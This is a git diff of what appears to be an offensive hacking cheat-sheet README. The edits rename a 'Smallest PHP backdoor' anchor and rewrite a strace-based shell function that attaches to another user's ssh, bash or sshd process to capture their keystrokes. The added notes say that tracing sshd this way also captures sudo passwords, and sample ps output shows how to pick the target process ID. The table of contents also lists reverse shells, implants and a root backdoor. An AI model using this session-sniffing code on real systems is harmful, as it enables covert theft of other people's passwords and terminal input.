diff --git a/README.md b/README.md index 7a27085..4f7bca0 100644 --- a/README.md +++ b/README.md @@ -73,7 +73,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [Background reverse shell](#backdoor-background-reverse-shell) 1. [authorized_keys](#backdoor-auth-keys) 1. [Remote access an entire network](#backdoor-network) - 1. [Smallest PHP backdoor](#carriage-return-backdoor) + 1. [Smallest PHP backdoor](#php-backdoor) 1. [Local Root backdoor](#ld-backdoor) 1. [Self-extracting implant](#implant) 1. [Host Recon](#hostrecon) @@ -1628,7 +1628,7 @@ Other methods: * [Gost/Cloudflared](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service) - our very own article * [Reverse Wireguard](https://thc.org/segfault/wireguard) - from segfault.net to any (internal) network. - + **6.iv. Smallest PHP Backdoor** Add this line to the beginning of any PHP file: @@ -2090,27 +2090,28 @@ Check out our very own [eBPF tools to sniff sudo/su/ssh passwords](https://githu **10.iv Sniff a user's outgoing SSH session or bash with strace** ```sh tit() { - strace -e trace="${2:-read}" -p "${1:?}" 2>&1 | stdbuf -oL grep "^${2:-read}"'.*= [1-9]$' | awk 'BEGIN{FS="\"";}{if ($2=="\\r"){print ""}else{printf $2}}' + strace -e trace="${1:?}" -p "${2:?}" 2>&1 | stdbuf -oL grep "^${1}"'.*= [1-9]$' | awk 'BEGIN{FS="\"";}{if ($2=="\\r"){print ""}else{printf $2}}' } -# tit $(pidof -s ssh) -# tit $(pidof -s bash) +# tit read $(pidof -s ssh) +# tit read $(pidof -s bash) ``` -It is also possible to sniff the SSHD process and capture sudo passwords. Note that we have to trace the `write()` call instead (because sshd 'writes' data to the bash): +It is also possible to sniff the SSHD process (captures also sudo passwords etc). Note that we trace the `write()` call instead (because sshd 'writes' data to the bash): ```sh # Find the sshd PID that spawned the bash: -ps -eF f | grep -A1 'sshd.*pts' +ps -eF | grep -E '(^UID|sshd.*pts)' | grep -v ' grep' ... -paralle+ 7309 7303 0 5088 6652 0 16:20 ? S 0:04 | \_ sshd: parallels@pts/1 -paralle+ 7310 7309 0 2027 4608 0 16:20 pts/1 Ss+ 0:00 | \_ -bash +UID PID PPID C SZ RSS PSR STIME TTY TIME CMD +paralle+ 7770 7764 0 5088 6780 1 Aug28 ? 00:00:05 sshd: parallels@pts/0 +paralle+ 9056 9050 0 5088 6652 1 Aug28 ? 00:00:00 sshd: parallels@pts/1 +paralle+ 11938 11932 0 5074 6772 1 10:59 ? 00:00:00 sshd: parallels@pts/3 ... ``` -Sniff it: +Sniff 7770 (example): ```shell -tit 7309 write +tit write 7770 ``` - **10.v. Sniff a user's outgoing SSH session with a wrapper script**